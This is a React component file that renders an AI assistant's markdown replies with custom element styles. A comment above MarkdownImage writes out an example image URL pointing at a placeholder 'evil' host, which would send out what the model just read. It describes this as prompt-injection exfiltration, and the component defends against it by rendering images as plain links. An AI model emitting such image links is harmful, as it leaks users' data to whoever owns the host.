/**
 * Markdown — how an assistant's reply is rendered, wherever it appears
 * (the chat, a task's transcript).
 *
 * Tailwind ships no prose styles in this project, so the element styles are
 * spelled out: mono for code, square corners, design tokens only. Links open
 * in a new tab; the reply is the model's text and should not navigate the
 * app away.
 */
import ReactMarkdown from "react-markdown";
import remarkGfm from "remark-gfm";
import type * as React from "react";

type Props = { children?: React.ReactNode };

/**
 * An image in a reply is fetched the moment it renders, so `![x](https://evil/?q=<what the model
 * just read>)` leaks it to whoever owns that host (the standard prompt-injection exfiltration).
 * Shown as a link the user can choose to open. Shared by every place model markdown is rendered.
 */
export function MarkdownImage({ src, alt }: { src?: string; alt?: string }) {
  return (
    <a href={src} target="_blank" rel="noopener noreferrer" className="text-accent underline underline-offset-2 hover:opacity-80">
      {alt ? `[image: ${alt}]` : "[image]"}
    </a>
  );
}

const COMPONENTS = {
  p: ({ children }: Props) => <p className="mb-2 last:mb-0 whitespace-pre-wrap">{children}</p>,
  ul: ({ children }: Props) => <ul className="mb-2 last:mb-0 ml-4 list-disc space-y-1">{children}</ul>,
  ol: ({ children }: Props) => <ol className="mb-2 last:mb-0 ml-4 list-decimal space-y-1">{children}</ol>,
  li: ({ children }: Props) => <li>{children}</li>,
  strong: ({ children }: Props) => <strong className="font-semibold text-fg">{children}</strong>,
  em: ({ children }: Props) => <em className="italic">{children}</em>,
  code: ({ children }: Props) => <code className="bg-bg-sunken px-1 py-0.5 font-mono text-[12px]">{children}</code>,
  pre: ({ children }: Props) => (
    <pre className="mb-2 last:mb-0 overflow-x-auto border border-border bg-bg-sunken p-2 font-mono text-[12px] [&_code]:bg-transparent [&_code]:p-0">
      {children}
    </pre>
  ),
  a: ({ href, children }: Props & { href?: string }) => (
    <a href={href} target="_blank" rel="noopener noreferrer" className="text-accent underline underline-offset-2 hover:opacity-80">
      {children}
    </a>
  ),
  img: MarkdownImage,
  h1: ({ children }: Props) => <h1 className="mb-2 mt-1 text-base font-semibold">{children}</h1>,
  h2: ({ children }: Props) => <h2 className="mb-2 mt-1 text-sm font-semibold">{children}</h2>,
  h3: ({ children }: Props) => <h3 className="mb-1 mt-1 text-sm font-semibold">{children}</h3>,
  blockquote: ({ children }: Props) => (
    <blockquote className="mb-2 last:mb-0 border-l-2 border-border pl-3 text-fg-muted">{children}</blockquote>
  ),
  table: ({ children }: Props) => (
    <div className="mb-2 last:mb-0 overflow-x-auto">
      <table className="w-full border-collapse text-xs">{children}</table>
    </div>
  ),
  th: ({ children }: Props) => <th className="border border-border bg-bg-sunken px-2 py-1 text-left font-semibold">{children}</th>,
  td: ({ children }: Props) => <td className="border border-border px-2 py-1">{children}</td>,
};

export function Markdown({ text }: { text: string }) {
  return (
    <ReactMarkdown remarkPlugins={[remarkGfm]} components={COMPONENTS}>
      {text}
    </ReactMarkdown>
  );
}
